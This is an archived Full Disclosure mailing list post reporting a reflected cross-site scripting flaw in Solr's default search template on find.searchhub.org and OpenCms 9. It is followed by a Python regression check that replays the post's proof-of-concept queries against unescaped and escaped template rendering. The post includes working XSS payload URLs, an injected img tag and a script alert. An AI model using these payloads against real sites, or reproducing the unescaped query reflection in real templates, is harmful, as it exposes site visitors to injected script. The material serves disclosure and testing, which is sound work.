Full Disclosure mailing list archives
XSS - find.searchhub.org, opencms version9 and others
From: jkmac () Safe-mail net
Date: Tue, 20 May 2014 16:23:37 -0400
Hello,

the default search template for solr is prone to XSS, because nobody validated the input.

PoC:
http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E
http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E

This is also valid for any opencms website that uses the solr search, e.g. the default opencms search template based on solr in opencms version 9. E.g. point your browser to http://localhost:8080/opencms/opencms/demo/search-page/ and search for

<img src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'>

That might not be a solr issue, but an implementation one.

Regards.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
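A regression check for the reflection reported in the message above, added here as an example and not code from Solr, OpenCms or the poster. The template string and all function names are hypothetical; the two queries are decoded from the PoC URLs in the post.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The two PoC URLs from the post; the decoded q value is what the search page receives.
POC_URLS = [
    "http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E",
    "http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E",
]

# Hypothetical search template: echoes the query in the search box and in the heading.
TEMPLATE = '<form><input name="q" value="{q}"></form><p>Results for {q}</p>'
EXPECTED_TAGS = ["form", "input", "p"]  # start tags the template itself emits

def query_of(url):
    """Return the decoded q parameter of a search URL."""
    return parse_qs(urlsplit(url).query)["q"][0]

def render_unsafe(q):
    """Reflect the query as-is, the behaviour the post reports."""
    return TEMPLATE.format(q=q)

def render_escaped(q):
    """Reflect the query HTML-encoded, safe for element text and quoted attributes."""
    return TEMPLATE.format(q=escape(q, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag an HTML parser sees in the response."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(page):
    """Start tags present in the page beyond those of the template."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    extra = list(collector.tags)
    for tag in EXPECTED_TAGS:
        if tag in extra:
            extra.remove(tag)
    return extra

if __name__ == "__main__":
    for url in POC_URLS:
        q = query_of(url)
        print("unsafe:", injected_tags(render_unsafe(q)),
              "escaped:", injected_tags(render_escaped(q)))
```

Running `injected_tags` over rendered search responses in a test suite flags any template change that lets the query reach the page as markup again.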